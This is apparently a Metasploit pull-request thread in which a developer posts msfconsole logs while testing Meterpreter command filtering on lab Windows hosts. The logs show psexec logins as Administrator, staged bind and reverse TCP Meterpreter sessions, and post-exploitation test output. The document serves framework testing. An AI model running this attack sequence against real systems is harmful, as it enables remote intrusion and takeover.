`rl_complete'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4374:in `_rl_dispatch_subseq'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4363:in `_rl_dispatch'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4779:in `readline_internal_charloop'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4853:in `readline_internal'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4875:in `readline'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/input/readline.rb:162:in `readline_with_output'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/input/readline.rb:100:in `pgets'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:321:in `get_input_line'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:141:in `run'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'", "/home/gwillcox/git/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:583:in `_interact'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/interactive.rb:51:in `interact'", "/home/gwillcox/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1545:in `cmd_sessions'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:543:in `run_command'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:492:in `block in run_single'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `each'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `run_single'", "/home/gwillcox/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:223:in `cmd_exploit'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:543:in `run_command'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:492:in `block in run_single'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `each'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `run_single'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run'", "/home/gwillcox/git/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'", "/home/gwillcox/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'", "./msfconsole:23:in `<main>'"]
msf6 exploit(multi/handler) > sessions -i 8
[*] Starting interaction with 8...


getuid
^C[-] sessions: Interrupted
msf6 exploit(multi/handler) > 

Know you mentioned you couldn't replicate this Spencer, so here are my tests again from tonight showing I was still able to replicate this issue:

~/git/metasploit-framework │ land-pr14617:pr/14617 ⇣8⇡92 *1 ?15  git rebase upstream/master                       ✔ │ 2.7.2 Ruby 
First, rewinding head to replay your work on top of it...
Applying: Enumerate Meterpreter's supported core commands
Applying: Add a meterpreter test for enumerating core commands
Applying: Filter Meterpreter commands based on support instead of fingerprinting
Applying: Add and use a callback to report meterpreter commands that are disabled
Applying: Raise a more specific error when loading an unsupported extension
Applying: Consistently return nil when an id or name fails to resolve
Applying: Disabling filtering via command IDs on Windows for now
Applying: Use a more descriptive status indicator for command routines
 ~/git/metasploit-framework │ land-pr14617:pr/14617 ⇣8⇡94 *1 ?15  ./msfconsole                               ✔ │ 26s │ 2.7.2 Ruby 
[-] No local database connected, meaning some Metasploit features will not be available. A full list of the affected features & database setup instructions can be found here: https://github.com/rapid7/metasploit-framework/wiki/msfdb:-Database-Features-&-How-to-Set-up-a-Database-for-Metasploit
[!] The following modules could not be loaded!..\
[!] 	/home/gwillcox/git/metasploit-framework/modules/auxiliary/gather/office365userenum.py
[!] Please see /home/gwillcox/.msf4/logs/framework.log for details.
                                                  
               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:                                
                                :::::::+:
                      Metasploit

       =[ metasploit v6.0.31-dev-76a0bdbea0               ]
+ -- --=[ 2099 exploits - 1128 auxiliary - 358 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Open an interactive Ruby terminal with 
irb

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload java/meterpreter/bind_tcp 
payload => java/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set RHOST 172.21.254.83
RHOST => 172.21.254.83
msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.21.254.83:4444
[*] Sending stage (58147 bytes) to 172.21.254.83
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.21.254.83:4444) at 2021-02-11 20:39:25 -0600

meterpreter > load [-] Session manipulation failed: No such file or directory @ dir_initialize - /home/gwillcox/.msf4/payloads/meterpreter ["/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:129:in `open'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:129:in `entries'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:129:in `meterpreter_enum_ext'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:88:in `block in list_meterpreter_extensions'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:86:in `each'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:86:in `list_meterpreter_extensions'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1334:in `block in cmd_load_tabs'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1334:in `map'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1334:in `cmd_load_tabs'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:455:in `tab_complete_helper'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:414:in `block in tab_complete_stub'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:403:in `each'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:403:in `tab_complete_stub'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:388:in `tab_complete'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:69:in `block in init_tab_complete'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/readline.rb:136:in `readline_attempted_completion_function'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:6329:in `gen_completion_matches'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:6813:in `rl_complete_internal'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:6903:in `rl_complete'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4374:in `_rl_dispatch_subseq'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4363:in `_rl_dispatch'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4779:in `readline_internal_charloop'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4853:in `readline_internal'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4875:in `readline'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/input/readline.rb:162:in `readline_with_output'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/input/readline.rb:100:in `pgets'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:321:in `get_input_line'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:141:in `run'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'", "/home/gwillcox/git/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:583:in `_interact'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/interactive.rb:51:in `interact'", "/home/gwillcox/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1545:in `cmd_sessions'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:543:in `run_command'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:492:in `block in run_single'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `each'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `run_single'", "/home/gwillcox/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:223:in `cmd_exploit'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:543:in `run_command'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:492:in `block in run_single'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `each'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `run_single'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run'", "/home/gwillcox/git/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'", "/home/gwillcox/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'", "./msfconsole:23:in `<main>'"]
msf6 exploit(multi/handler) > 

[gwillcox-r7]

Edit: Moving the previous contents of this comment as this issue seems to be specific to Java Meterpreter and is not related to this PR's changes.

[gwillcox-r7]

Rebased to include the recent Gem bump update, should now be ready for testing.

[gwillcox-r7]

Python and Java seem to be working fine:

Windows 10 x64 with Python and Java Payloads

msf6 exploit(multi/handler) > set RHOST 172.22.109.251
RHOST => 172.22.109.251
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (python/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  172.22.109.251   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.22.109.251:4444
[*] Sending stage (39344 bytes) to 172.22.109.251
[*] Meterpreter session 5 opened (0.0.0.0:0 -> 172.22.109.251:4444) at 2021-02-19 17:30:41 -0600
[*] Session ID 5 (0.0.0.0:0 -> 172.22.109.251:4444) processing AutoRunScript 'post/test/meterpreter'
[*] Running against session 5
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[-] FAILED: should return network routes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: Unknown error
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.109.251 - Meterpreter session 5 closed.  Reason: User exit
msf6 exploit(multi/handler) > set payload java/meterpreter/bind_tcp 
payload => java/meterpreter/bind_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (java/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  172.22.109.251   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.22.109.251:4444
[*] Sending stage (58108 bytes) to 172.22.109.251
[*] Meterpreter session 6 opened (0.0.0.0:0 -> 172.22.109.251:4444) at 2021-02-19 17:31:45 -0600
[*] Session ID 6 (0.0.0.0:0 -> 172.22.109.251:4444) processing AutoRunScript 'post/test/meterpreter'
[*] Running against session 6
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[*] Session doesn't implement getpid, skipping test
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 19; Failed: 0

meterpreter > getpid
[-] The "getpid" command is not supported by this Meterpreter type (java/windows)
meterpreter > 

Also the Windows x64 payload is working well:

Windows 10 x64 with x64 payload

msf6 exploit(windows/smb/psexec) > exploit

[*] 172.22.109.251:445 - Connecting to the server...
[*] 172.22.109.251:445 - Authenticating to 172.22.109.251:445 as user 'Administrator'...
[*] 172.22.109.251:445 - Selecting PowerShell target
[*] 172.22.109.251:445 - Executing the payload...
[+] 172.22.109.251:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 172.22.109.251:4444
[*] Sending stage (200262 bytes) to 172.22.109.251
[*] Meterpreter session 4 opened (0.0.0.0:0 -> 172.22.109.251:4444) at 2021-02-19 17:28:27 -0600

meterpreter > 
[*] Session ID 4 (0.0.0.0:0 -> 172.22.109.251:4444) processing AutoRunScript 'post/test/meterpreter'
[*] Running against session 4
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.109.251 - Meterpreter session 4 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting   Required  Description
   ----                  ---------------   --------  -----------
   RHOSTS                172.22.109.251    yes       The target host(s), range CIDR identifier, or
                                                     hosts file with syntax 'file:<path>'
   RPORT                 445               yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                     no        Service description to to be used on target fo
                                                     r pretty listing
   SERVICE_DISPLAY_NAME                    no        The service display name
   SERVICE_NAME                            no        The service name
   SHARE                                   no        The share to connect to, can be an admin share
                                                      (ADMIN$,C$,...) or a normal read/write folder
                                                      share
   SMBDomain             .                 no        The Windows domain to use for authentication
   SMBPass               *censored*    no        The password for the specified username
   SMBUser               Administrator     no        The username to authenticate as


Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     172.22.109.251   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/psexec) >

Also working with x86 on a Windows 10 x64 system:

Windows 10 x64 with x86 payload

msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                172.22.109.251   yes       The target host(s), range CIDR identifier, or h
                                                    osts file with syntax 'file:<path>'
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for
                                                     pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                                  no        The share to connect to, can be an admin share
                                                    (ADMIN$,C$,...) or a normal read/write folder s
                                                    hare
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBUser                                no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.22.111.211   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass *censored*
SMBPass => *censored*
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.22.111.211:4444 
[*] 172.22.109.251:445 - Connecting to the server...
[*] 172.22.109.251:445 - Authenticating to 172.22.109.251:445 as user 'Administrator'...
[*] 172.22.109.251:445 - Selecting PowerShell target
[*] 172.22.109.251:445 - Executing the payload...
[+] 172.22.109.251:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 172.22.109.251
[*] Meterpreter session 1 opened (172.22.111.211:4444 -> 172.22.109.251:57865) at 2021-02-19 17:26:55 -0600

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.109.251 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) > setg AutoRunScript post/test/meterpreter
AutoRunScript => post/test/meterpreter
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.22.111.211:4444 
[*] 172.22.109.251:445 - Connecting to the server...
[*] 172.22.109.251:445 - Authenticating to 172.22.109.251:445 as user 'Administrator'...
[*] 172.22.109.251:445 - Selecting PowerShell target
[*] 172.22.109.251:445 - Executing the payload...
[*] Sending stage (175174 bytes) to 172.22.109.251
[*] Meterpreter session 2 opened (172.22.111.211:4444 -> 172.22.109.251:57873) at 2021-02-19 17:27:22 -0600
[+] 172.22.109.251:445 - Service start timed out, OK if running a command or non-service executable...

meterpreter > run post/test/meterpreter

[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0
meterpreter >

[gwillcox-r7]

Output from PHP tests look good as well:

Looks like we are also not showing commands which aren't supported by a given implementation as can be seen below where the route command is not listed since it is not supported by PHP Meterpreter:

Overall this looks good to land, will merge this in now, nice work @zeroSteiner!

[gwillcox-r7]

Release Notes

Updated the core Meterpreter and console libraries to better handle cases where a given implementation of Meterpreter may not support a certain command. Now, instead of each version of Meterpreter trying to handle invalid commands which previously lead to errors, a check is made to verify that the command is one the Meterpreter supports, with an error message provided if not. Additionally, the output from running the help or ? command inside the meterpreter prompt has been updated to only display the commands which a given Meterpreter implementation supports. Tests have also been updated accordingly to support checking this functionality works as expected.